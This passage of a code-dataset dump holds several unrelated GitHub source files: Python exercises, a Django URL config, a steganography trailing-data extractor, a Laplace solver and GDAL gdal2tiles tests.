range(0, ordem):\n mat.append([])\nprint(mat)\n\n\nsala_estado = 0\np = 0\n\nfor i in range(0, ordem):\n for j in range(0, ordem):\n sala = \"sala\" + str(posicao_sala[p])\n sala_estado = vet_estado[randint(0, 1)]\n dic = {sala: {\"estado\": sala_estado, \"robo\": False}}\n mat[i].append(dic)\n p += 1\n\n\nfor i in range(0, ordem):\n for j in range(0, ordem):\n print(f\"{mat[i][j]} \", end='')\n print()\n\n# print(mat[0][0].get('sala0').get('estado'))\np = 0\n\nmat[0][0]['sala0']['robo'] = True\n\nfor i in range(0, ordem):\n for j in range(0, ordem):\n\n sala = \"sala\" + str(posicao_sala[p])\n\n if mat[i][j].get(sala).get('estado') == 'limpo':\n print(f'A sala {sala} está limpa! \\n')\n mat[i][j][sala]['robo'] = False\n if 1 + j < ordem:\n print(f'O robo está indo para a sala{p+1} \\n')\n mat[i][1 + j][f\"sala{p+1}\"]['robo'] = True\n elif 1 + i < ordem:\n mat[1 + i][0][f'sala{p+1}']['robo'] = True\n elif i == j:\n print('Robo voltando para a sala0.\\n')\n mat[0][0]['sala0']['robo'] = True\n\n elif mat[i][j].get(sala).get('estado') == 'sujo':\n print(f'A sala {sala} está suja! \\n')\n print(f'O robo está limpando!\\n')\n mat[i][j][sala]['estado'] = 'limpo'\n print(f'Sala limpa!')\n mat[i][j][sala]['robo'] = False\n if 1 + j < ordem:\n print(f'O robo está indo para a sala{p + 1} \\n')\n mat[i][j + 1][f'sala{p+1}']['robo'] = True\n elif 1 + i < ordem:\n mat[i + 1][0][f'sala{p+1}']['robo'] = True\n elif i == j:\n print('Robo voltando para a sala0 \\n')\n mat[0][0]['sala0']['robo'] = True\n\n p += 1\n\n\np = 0\nfor i in range(0, ordem):\n for j in range(0, ordem):\n sala = \"sala\" + str(posicao_sala[p])\n p += 1\n print(f'{mat[i][j][sala][\"estado\"], mat[i][j][sala][\"robo\"]} ', end='')\n\n print()\n\n\n","repo_name":"DLuizBM/Contents","sub_path":"Python/ExerciciosColecoes/aspirador.py","file_name":"aspirador.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18586700542","text":"from pathlib import Path\n\n\"\"\"\nWrite a while loop that prompts users for their name. \nCollect all the names that are entered, and then write these names to a file called guest_book.txt. \nMake sure each entry appears on a new line in the file.\n\"\"\"\n\npath = Path('guests_book.txt')\nguests = ''\nask_for_name = True\n\nwhile ask_for_name:\n guest = f\"{' '.join(input('What is your name? Enter q to quit. 
').split()).title()}\\n\"\n\n    if guest.replace('\\n', '') == 'Q':\n        ask_for_name = False\n    else:\n        guests += guest\npath.write_text(guests)\n","repo_name":"Iskanderrus/PythonFromScratch","sub_path":"Code Samples/Chapter 10/guests_book_writer.py","file_name":"guests_book_writer.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"20195032784","text":"__author__ = 'oahayder'\n\nfrom django.conf.urls import patterns, url, include\nfrom proximitysearch import views\n\nurlpatterns = patterns('',\n    # ex: /proximitysearch/nearby/35.5555/120.99999\n    url(r'^nearby/(?P<latitude>\\-?\\d+\\.?\\d*)/(?P<longitude>\\-?\\d+\\.?\\d*)/$', views.NearbyFoodFacilityList.as_view(), name='nearby'),\n    url(r'^api-docs/', include('rest_framework_swagger.urls')),\n)\n","repo_name":"oahayder/feedme","sub_path":"feedme/proximitysearch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71386925162","text":"\nimport logging\nlogger = logging.getLogger('StegoVeritas:Modules:Image:Analysis:Trailing')\n\nimport os\nfrom struct import unpack\nfrom .. import png\nfrom ..gif import gif as gif_module\n\ndef run(image):\n    \"\"\"Extracts trailing data from the image.\n\n    Args:\n        image: SVImage class instance\n\n    Returns:\n        None\n\n    Saves the result to RESULTSDIR/trailing_data.bin\n    \"\"\"\n\n    global output_file\n    output_file = os.path.join(image.veritas.results_directory, \"trailing_data.bin\")\n\n    args = image.veritas.args\n\n    # Nothing to do\n    if not args.auto and not args.trailing:\n        logger.debug('Nothing to do.')\n        return\n\n    try:\n        if image.file.format == \"JPEG\":\n            jpeg(image)\n        elif image.file.format == \"TIFF\":\n            tiff(image)\n        elif image.file.format == \"PNG\":\n            png(image)\n        elif image.file.format == \"BMP\":\n            bmp(image)\n        elif image.file.format == \"GIF\":\n            gif(image)\n        else:\n            print(\"Image Trailing: No support yet for format {0}\".format(image.file.format))\n            return\n    except Exception as e:\n        print(\"Image Trailing: Something went wrong... please submit a bug report. Error: {}\".format(e))\n\n\ndef gif(image):\n    \n    # Load up the gif\n    g = gif_module(fileName=image.veritas.file_name)\n    \n    # Parse it\n    g.parse()\n    \n    # Check for excess info\n    if len(g.gif) > 0:\n        print(\"Discovered trailing data: {0}\".format(g.gif))\n        with open(output_file, \"wb\") as outFile:\n            outFile.write(g.gif)\n\n\ndef png(image):\n    pngFile = open(image.veritas.file_name,\"rb\").read()\n    \n    # TODO: This isn't 100% accurate. Rework to follow tags correctly.\n    
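# A more robust approach (sketch) would walk the chunk structure instead of\n    # splitting on the literal bytes b\"IEND\": skip the 8-byte signature, then\n    # repeatedly read a 4-byte big-endian length, a 4-byte type, the data and a\n    # 4-byte CRC until the IEND chunk; anything after that CRC is trailing data.\n    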
pngFile = pngFile.split(b\"IEND\")[1][4:]\n    \n    if len(pngFile) != 0:\n        print(\"Discovered Trailing Data:\\n{0}\".format(pngFile))\n        with open(output_file,\"wb\") as outFile:\n            outFile.write(pngFile)\n\n\ndef bmp(image):\n    # This one is pretty easy\n    myBMP = open(image.veritas.file_name,\"rb\").read()\n    \n    # The BMP header stores the declared file size at offset 2\n    size = unpack(\"<I\",myBMP[2:6])[0]\n    \n    if len(myBMP) > size:\n        print(\"Trailing Data Discovered... Saving\")\n        print(myBMP[size:])\n        with open(output_file,\"wb\") as outFile:\n            outFile.write(myBMP[size:])\n\n\ndef tiff(image):\n    steg = open(image.veritas.file_name,\"rb\").read()\n    \n    # Determine endianness from the TIFF byte-order mark\n    if steg[0:2] == b'II':\n        fmt = \"<I\"\n        fmt_s = \"<h\"\n    elif steg[0:2] == b'MM':\n        fmt = \">I\"\n        fmt_s = \">h\"\n    else:\n        print(\"Trailing: Error Invalid tiff magic numbers\")\n        return\n    \n    # Read header\n    ifd = unpack(fmt,steg[4:8])[0]\n    \n    # Read the number of tags\n    nEntries = unpack(fmt_s,steg[ifd:ifd+2])[0]\n    \n    # We want to find the maximum address\n    # Right now our max address is the end of the IFD block\n    maxAddr = ifd + (nEntries*0xc) + 2\n    \n    # Loop through the tags\n    for i in range(nEntries):\n        # Figure out our current file location\n        curAddr = ifd + 2 + (i * 0xc)\n\n        tag = unpack(fmt_s,steg[curAddr:curAddr+2])[0]\n        tagType = unpack(fmt_s,steg[curAddr+2:curAddr+4])[0]\n        count = unpack(fmt,steg[curAddr+4:curAddr+8])[0]\n        \n        # print(\"Tag: {0}\\nType: {1}\".format(tag,tagType))\n\n        # Tag types of ASCII and Unknown both have offsets associated\n        if tagType == 2 or tagType == 7:\n            offset = unpack(fmt,steg[curAddr+8:curAddr+0xc])[0]\n            # See if we have a new winner\n            if (offset + count) > maxAddr:\n                maxAddr = offset + count\n                #print(\"New max offset\")\n            # print(\"Found new offset: {0}\".format(hex(offset)))\n\n    # See if we have data hiding at the end\n    if len(steg) > maxAddr:\n        print(\"Trailing Data Discovered... Saving\")\n        print(steg[maxAddr:])\n        with open(output_file,\"wb\") as outFile:\n            outFile.write(steg[maxAddr:])\n\n\ndef jpeg(image):\n\n    # Official specs here: http://www.w3.org/Graphics/JPEG/itu-t81.pdf \n\n    # Index for marching through the file \n    i = 0\n    \n    # These markers don't have a length attribute\n    nonLenMarkers = [ b'\\xff\\xd8', b'\\xff\\x01', b'\\xff\\xd0', b'\\xff\\xd1', b'\\xff\\xd2', b'\\xff\\xd3', b'\\xff\\xd4', b'\\xff\\xd5', b'\\xff\\xd6', b'\\xff\\xd7' ]\n\n    # Open up the file\n    with open(image.veritas.file_name,\"rb\") as myFile:\n        steg = myFile.read()\n    \n    while True:\n        # Grab the current header\n        hdr = steg[i:i+2]\n        \n        # TODO: Add py logging here\n        #print(\"Found Header: {0}\".format(hdr))\n        \n        # if Start of Image, Temporary Private, Restart, things that don't have an associated length field\n        if hdr in nonLenMarkers:\n            # Just move to the next marker\n            i = i + 2\n            continue\n        \n        # If we've found our way to the end of the jpeg\n        if hdr == b'\\xff\\xd9':\n            #print(\"Made it to the end!\")\n            # Increment 2 so we can check the length\n            i += 2\n            break\n        \n        # Unpack the length field\n        ln = unpack(\">H\",steg[i+2:i+4])[0]\n        \n        # print(\"Found Length: {0}\".format(ln))\n        \n        # Update the index with the known length\n        i = i+ln+2\n        \n        # When we hit scan data, we scan to the end of the format\n        if hdr == b'\\xff\\xda':\n            #print(\"Start of Scan data\")\n            # Find the end marker\n            i += steg[i:].index(b'\\xff\\xd9')\n    \n    # Check for trailers\n    if i != len(steg):\n        print(\"Trailing Data Discovered... 
Saving\")\n print(steg[i:])\n # Save it off for reference\n with open(output_file, \"wb\") as outFile:\n outFile.write(steg[i:])\n","repo_name":"bannsec/stegoVeritas","sub_path":"stegoveritas/modules/image/analysis/trailing.py","file_name":"trailing.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"19"} +{"seq_id":"24119979507","text":"import torch\nimport numpy as np\n\n\ndef get_solution(input_T, isNeum, dtype = torch.FloatTensor):\n \"FDM method to solve laplace eqn\"\n \n maxIter = 1e8\n padT = input_T[0,0,:,:].numpy()\n output_T = input_T.clone().numpy()\n # READ NEUMANN BC FROM INPUT_T\n if isNeum[0]:\n nbc_left = padT[2:-2,0]\n# print(nbc_left)\n if isNeum[1]:\n nbc_upper = padT[0,2:-2]\n if isNeum[2]:\n nbc_right = padT[2:-2,-1]\n if isNeum[3]:\n nbc_bottom = padT[-1,2:-2]\n \n # Acquire the real compute domain of T \n T = padT[1:-1,1:-1]\n L = 1\n h = L / np.size(padT[0,:])\n T_new = np.copy(T)\n iteration = 0\n while iteration < maxIter:\n T_new[1:-1, 1:-1] = ((T_new[0:-2, 1:-1] + T_new[2:, 1:-1]) + (T_new[1:-1,0:-2] + T_new[1:-1, 2:]))*0.25\n if isNeum[0]:\n T_new[1:-1,0] = 1/3 * (4*T_new[1:-1,1] - T_new[1:-1, 2] - 2*h*nbc_left) \n err = (T_new - T).flat\n err = np.sqrt(np.dot(err,err))\n if err <= 1e-12:\n output_T[0,0,1:-1,1:-1] = T_new\n return torch.from_numpy(output_T).type(dtype)\n T = np.copy(T_new)\n iteration += 1\n output_T[0,0,1:-1,1:-1] = T_new \n return torch.from_numpy(output_T).type(dtype)\n","repo_name":"Yaling-Liu-Lab/Generate_CFD_by_DL","sub_path":"UNet_neum/get_solution.py","file_name":"get_solution.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"70594740204","text":"from gui.DataStorage import DataStorage\nfrom gui.jobs.Job import Job\nfrom hosts.HostInterface import HostInterface\n\n\nclass LocalComputer(HostInterface):\n \"\"\"\n A class representing the local computer\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Constructor\n :param kwargs: the remaining arguments\n \"\"\"\n self.tool = DataStorage.get(\"tool\")\n self.window = DataStorage.get(\"window\")\n self.conf = DataStorage.get(\"conf\")\n\n def train(self, agent, env, project_name):\n \"\"\"\n Train the agent in the environment\n :param agent: the agent\n :param env: the environment\n :param project_name: the name of the project for which the agent is trained\n \"\"\"\n job = Job.create_on_local_computer(self.window.filesystem_mutex, agent, env, project_name, {\n \"host\": \"local computer\",\n \"hardware\": \"cpu\"\n }, forward_mutex=False)\n if job is None:\n return\n agent = project_name + f\"/agents/{agent}\"\n env = project_name + f\"/environments/{env}\"\n self.window.pool.submit(job, agent=agent, env=env, projects_directory=self.conf.projects_directory)\n\n def retrieve_analysis_files(self, job_json):\n \"\"\"\n Retrieve the analysis files\n :param job_json: the json describing the job whose analysis must be retrieved\n \"\"\"\n pass\n","repo_name":"ChampiB/Deep_Active_Inference_Analysis","sub_path":"hosts/impl/LocalComputer.py","file_name":"LocalComputer.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"38151417547","text":"import glob\nimport os\nimport os.path\nimport shutil\nimport sys\n\nimport pytest\nimport test_py_scripts # noqa # pylint: disable=E0401\n\nfrom osgeo import 
gdal # noqa\nfrom osgeo_utils.gdalcompare import compare_db\n\npytestmark = pytest.mark.skipif(\n test_py_scripts.get_py_script(\"gdal2tiles\") is None,\n reason=\"gdal2tiles not available\",\n)\n\n\n@pytest.fixture()\ndef script_path():\n return test_py_scripts.get_py_script(\"gdal2tiles\")\n\n\ndef _verify_raster_band_checksums(filename, expected_cs=[]):\n ds = gdal.Open(filename)\n if ds is None:\n pytest.fail('cannot open output file \"%s\"' % filename)\n\n got_cs = [ds.GetRasterBand(i + 1).Checksum() for i in range(ds.RasterCount)]\n if isinstance(expected_cs[0], list):\n assert got_cs in expected_cs\n else:\n assert got_cs == expected_cs\n\n ds = None\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_simple(script_path):\n\n shutil.copy(\n test_py_scripts.get_data_path(\"gdrivers\") + \"small_world.tif\",\n \"tmp/out_gdal2tiles_smallworld.tif\",\n )\n\n os.chdir(\"tmp\")\n test_py_scripts.run_py_script(\n script_path, \"gdal2tiles\", \"-q out_gdal2tiles_smallworld.tif\"\n )\n os.chdir(\"..\")\n\n os.unlink(\"tmp/out_gdal2tiles_smallworld.tif\")\n\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.png\",\n expected_cs=[31420, 32522, 16314, 17849],\n )\n\n for filename in [\n \"googlemaps.html\",\n \"leaflet.html\",\n \"openlayers.html\",\n \"tilemapresource.xml\",\n ]:\n assert os.path.exists(\"tmp/out_gdal2tiles_smallworld/\" + filename), (\n \"%s missing\" % filename\n )\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_zoom_option(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n # Because of multiprocessing, run as external process, to avoid issues with\n # Ubuntu 12.04 and socket.setdefaulttimeout()\n # as well as on Windows that doesn't manage to fork\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q --force-kml --processes=2 -z 0-1 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/1/0/0.png\",\n expected_cs=[24063, 23632, 14707, 17849],\n )\n\n assert not os.path.exists(\"tmp/out_gdal2tiles_smallworld/0/0/0.png.aux.xml\")\n assert not os.path.exists(\"tmp/out_gdal2tiles_smallworld/1/0/0.png.aux.xml\")\n\n if gdal.GetDriverByName(\"KMLSuperOverlay\") is None:\n pytest.skip(\"KMLSuperOverlay driver missing\")\n\n ds = gdal.Open(\"tmp/out_gdal2tiles_smallworld/doc.kml\")\n assert ds is not None, \"did not get kml\"\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_resampling_option(script_path):\n\n resampling_list = [\n \"average\",\n \"near\",\n \"bilinear\",\n \"cubic\",\n \"cubicspline\",\n \"lanczos\",\n \"antialias\",\n \"mode\",\n \"max\",\n \"min\",\n \"med\",\n \"q1\",\n \"q3\",\n ]\n try:\n import numpy\n from PIL import Image\n\n import osgeo.gdal_array as gdalarray\n\n del Image, numpy, gdalarray\n except ImportError:\n # 'antialias' resampling is not available\n resampling_list.remove(\"antialias\")\n\n out_dir = \"tmp/out_gdal2tiles_smallworld\"\n\n for resample in resampling_list:\n\n shutil.rmtree(out_dir, ignore_errors=True)\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q --resampling={0} {1} {2}\".format(\n resample,\n test_py_scripts.get_data_path(\"gdrivers\") + \"small_world.tif\",\n out_dir,\n ),\n )\n\n # very basic check\n ds = gdal.Open(\"tmp/out_gdal2tiles_smallworld/0/0/0.png\")\n if ds is None:\n pytest.fail(\"resample option {0!r} 
failed\".format(resample))\n ds = None\n\n shutil.rmtree(out_dir, ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_xyz(script_path):\n\n try:\n shutil.copy(\n test_py_scripts.get_data_path(\"gdrivers\") + \"small_world.tif\",\n \"tmp/out_gdal2tiles_smallworld_xyz.tif\",\n )\n\n os.chdir(\"tmp\")\n ret = test_py_scripts.run_py_script(\n script_path,\n \"gdal2tiles\",\n \"-q --xyz --zoom=0-1 out_gdal2tiles_smallworld_xyz.tif\",\n )\n os.chdir(\"..\")\n\n assert \"ERROR ret code\" not in ret\n\n os.unlink(\"tmp/out_gdal2tiles_smallworld_xyz.tif\")\n\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld_xyz/0/0/0.png\",\n expected_cs=[31747, 33381, 18447, 17849],\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld_xyz/1/0/0.png\",\n expected_cs=[15445, 16942, 13681, 17849],\n )\n\n for filename in [\"googlemaps.html\", \"leaflet.html\", \"openlayers.html\"]:\n assert os.path.exists(\"tmp/out_gdal2tiles_smallworld_xyz/\" + filename), (\n \"%s missing\" % filename\n )\n assert not os.path.exists(\n \"tmp/out_gdal2tiles_smallworld_xyz/tilemapresource.xml\"\n )\n finally:\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_xyz\")\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_invalid_srs(script_path):\n \"\"\"\n Case where the input image is not georeferenced, i.e. it's missing the SRS info,\n and no --s_srs option is provided. The script should fail validation and terminate.\n \"\"\"\n\n shutil.copy(\n test_py_scripts.get_data_path(\"gdrivers\") + \"test_nosrs.vrt\",\n \"tmp/out_gdal2tiles_test_nosrs.vrt\",\n )\n shutil.copy(test_py_scripts.get_data_path(\"gdrivers\") + \"byte.tif\", \"tmp/byte.tif\")\n\n os.chdir(\"tmp\")\n # try running on image with missing SRS\n ret = test_py_scripts.run_py_script(\n script_path, \"gdal2tiles\", \"-q --zoom=0-1 out_gdal2tiles_test_nosrs.vrt\"\n )\n\n # this time pass the spatial reference system via cli options\n ret2 = test_py_scripts.run_py_script(\n script_path,\n \"gdal2tiles\",\n \"-q --zoom=0-1 --s_srs EPSG:4326 out_gdal2tiles_test_nosrs.vrt\",\n )\n os.chdir(\"..\")\n\n os.unlink(\"tmp/out_gdal2tiles_test_nosrs.vrt\")\n os.unlink(\"tmp/byte.tif\")\n shutil.rmtree(\"tmp/out_gdal2tiles_test_nosrs\")\n\n assert \"ERROR ret code = 2\" in ret\n assert \"ERROR ret code\" not in ret2\n\n\ndef test_does_not_error_when_source_bounds_close_to_tiles_bound(script_path):\n \"\"\"\n Case where the border coordinate of the input file is inside a tile T but the first pixel is\n actually assigned to the tile next to T (nearest neighbour), meaning that when the query is done\n to get the content of T, nothing is returned from the raster.\n \"\"\"\n in_files = [\n \"./data/test_bounds_close_to_tile_bounds_x.vrt\",\n \"./data/test_bounds_close_to_tile_bounds_y.vrt\",\n ]\n out_folder = \"tmp/out_gdal2tiles_bounds_approx\"\n try:\n shutil.rmtree(out_folder)\n except Exception:\n pass\n\n try:\n for in_file in in_files:\n test_py_scripts.run_py_script(\n script_path, \"gdal2tiles\", \"-q -z 21-21 %s %s\" % (in_file, out_folder)\n )\n except TypeError:\n pytest.fail(\n \"Case of tile not getting any data not handled properly \"\n \"(tiles at the border of the image)\"\n )\n\n\ndef test_does_not_error_when_nothing_to_put_in_the_low_zoom_tile(script_path):\n \"\"\"\n Case when the highest zoom level asked is actually too low for any pixel of the raster to be\n selected\n \"\"\"\n in_file = \"./data/test_bounds_close_to_tile_bounds_x.vrt\"\n out_folder = \"tmp/out_gdal2tiles_bounds_approx\"\n 
try:\n shutil.rmtree(out_folder)\n except OSError:\n pass\n\n try:\n test_py_scripts.run_py_script(\n script_path, \"gdal2tiles\", \"-q -z 10 %s %s\" % (in_file, out_folder)\n )\n except TypeError:\n pytest.fail(\n \"Case of low level tile not getting any data not handled properly \"\n \"(tile at a zoom level too low)\"\n )\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_handle_utf8_filename(script_path):\n input_file = \"data/test_utf8_漢字.vrt\"\n\n out_folder = \"tmp/utf8_test\"\n\n try:\n shutil.rmtree(out_folder)\n except OSError:\n pass\n\n args = f\"-q -z 21 {input_file} {out_folder}\"\n\n test_py_scripts.run_py_script(script_path, \"gdal2tiles\", args)\n\n openlayers_html = open(\n os.path.join(out_folder, \"openlayers.html\"), \"rt\", encoding=\"utf-8\"\n ).read()\n assert \"test_utf8_漢字.vrt\" in openlayers_html\n\n try:\n shutil.rmtree(out_folder)\n except OSError:\n pass\n\n\ndef test_gdal2tiles_py_cleanup():\n\n lst = [\"tmp/out_gdal2tiles_smallworld\", \"tmp/out_gdal2tiles_bounds_approx\"]\n for filename in lst:\n try:\n shutil.rmtree(filename)\n except Exception:\n pass\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_exclude_transparent_tiles(script_path):\n\n output_folder = \"tmp/test_exclude_transparent_tiles\"\n os.makedirs(output_folder)\n\n try:\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-x -z 14-16 data/test_gdal2tiles_exclude_transparent.tif %s\"\n % output_folder,\n )\n\n # First row totally transparent - no tiles\n tiles_folder = os.path.join(output_folder, \"15\", \"21898\")\n dir_files = os.listdir(tiles_folder)\n assert not dir_files, \"Generated empty tiles for row 21898: %s\" % dir_files\n\n # Second row - only 2 non-transparent tiles\n tiles_folder = os.path.join(output_folder, \"15\", \"21899\")\n dir_files = sorted(os.listdir(tiles_folder))\n assert [\"22704.png\", \"22705.png\"] == dir_files, (\n \"Generated empty tiles for row 21899: %s\" % dir_files\n )\n\n # Third row - only 1 non-transparent tile\n tiles_folder = os.path.join(output_folder, \"15\", \"21900\")\n dir_files = os.listdir(tiles_folder)\n assert [\"22705.png\"] == dir_files, (\n \"Generated empty tiles for row 21900: %s\" % dir_files\n )\n\n finally:\n shutil.rmtree(output_folder)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_profile_raster(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q -p raster -z 0-1 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n try:\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.png\",\n expected_cs=[10125, 10802, 27343, 48852],\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/1/0/0.png\",\n expected_cs=[62125, 59756, 43894, 38539],\n )\n\n if gdal.GetDriverByName(\"KMLSuperOverlay\") is None:\n pytest.skip(\"KMLSuperOverlay driver missing\")\n\n if sys.platform != \"win32\":\n # For some reason, the checksums on the kml file on Windows are the ones of the below png\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.kml\",\n expected_cs=[29839, 34244, 42706, 64319],\n )\n finally:\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_profile_raster_oversample(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n 
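# -z 0-2 asks for one zoom level more than the -z 0-1 raster-profile test above, so the zoom-2 tiles must be oversampled from the source\n    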
test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q -p raster -z 0-2 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n assert os.path.exists(\"tmp/out_gdal2tiles_smallworld/2/0/0.png\")\n assert os.path.exists(\"tmp/out_gdal2tiles_smallworld/2/3/1.png\")\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/2/0/0.png\",\n expected_cs=[[51434, 55441, 63427, 17849], [51193, 55320, 63324, 17849]], # icc\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/2/3/1.png\",\n expected_cs=[[44685, 45074, 50871, 56563], [44643, 45116, 50863, 56563]], # icc\n )\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_profile_raster_xyz(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q -p raster --xyz -z 0-1 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n try:\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.png\",\n expected_cs=[11468, 10719, 27582, 48827],\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/1/0/0.png\",\n expected_cs=[60550, 62572, 46338, 38489],\n )\n\n if gdal.GetDriverByName(\"KMLSuperOverlay\") is None:\n pytest.skip(\"KMLSuperOverlay driver missing\")\n\n if sys.platform != \"win32\":\n # For some reason, the checksums on the kml file on Windows are the ones of the below png\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.kml\",\n expected_cs=[27644, 31968, 38564, 64301],\n )\n\n finally:\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_profile_geodetic_tmscompatible_xyz(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n \"-q -p geodetic --tmscompatible --xyz -z 0-1 \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld\",\n )\n\n try:\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.png\",\n expected_cs=[8560, 8031, 7209, 17849],\n )\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/1/0/0.png\",\n expected_cs=[2799, 3468, 8686, 17849],\n )\n\n if gdal.GetDriverByName(\"KMLSuperOverlay\") is None:\n pytest.skip(\"KMLSuperOverlay driver missing\")\n\n if sys.platform != \"win32\":\n # For some reason, the checksums on the kml file on Windows are the ones of the below png\n _verify_raster_band_checksums(\n \"tmp/out_gdal2tiles_smallworld/0/0/0.kml\",\n expected_cs=[12361, 18212, 21827, 5934],\n )\n\n finally:\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld\", ignore_errors=True)\n\n\n@pytest.mark.require_driver(\"PNG\")\ndef test_gdal2tiles_py_mapml(script_path):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_mapml\", ignore_errors=True)\n\n gdal.Translate(\n \"tmp/byte_APS.tif\",\n test_py_scripts.get_data_path(\"gcore\") + \"byte.tif\",\n options=\"-a_srs EPSG:5936 -a_ullr 0 40 40 0\",\n )\n\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n '-q -p APSTILE -w mapml -z 16-18 --url \"https://foo\" tmp/byte_APS.tif tmp/out_gdal2tiles_mapml',\n )\n\n mapml = 
open(\"tmp/out_gdal2tiles_mapml/mapml.mapml\", \"rb\").read().decode(\"utf-8\")\n # print(mapml)\n assert '' in mapml\n assert '' in mapml\n assert (\n ''\n in mapml\n )\n assert (\n ''\n in mapml\n )\n assert (\n ''\n in mapml\n )\n\n shutil.rmtree(\"tmp/out_gdal2tiles_mapml\", ignore_errors=True)\n gdal.Unlink(\"tmp/byte_APS.tif\")\n\n\ndef _convert_png_to_webp(frm, to, quality):\n src_ds = gdal.Open(frm)\n driver = gdal.GetDriverByName(\"WEBP\")\n driver.CreateCopy(to, src_ds, 0, options=[\"LOSSLESS=True\"])\n\n\ndef _run_webp_test(script_path, resampling):\n\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_png\", ignore_errors=True)\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_webp_from_png\", ignore_errors=True)\n shutil.rmtree(\"tmp/out_gdal2tiles_smallworld_webp\", ignore_errors=True)\n\n base_args = \"-q --processes=2 -z 0-1 -r \" + resampling + \" \"\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n base_args\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld_png\",\n )\n\n quality = 50\n test_py_scripts.run_py_script_as_external_script(\n script_path,\n \"gdal2tiles\",\n base_args\n + \"--tiledriver=WEBP --webp-lossless \"\n + test_py_scripts.get_data_path(\"gdrivers\")\n + \"small_world.tif tmp/out_gdal2tiles_smallworld_webp\",\n )\n\n to_convert = 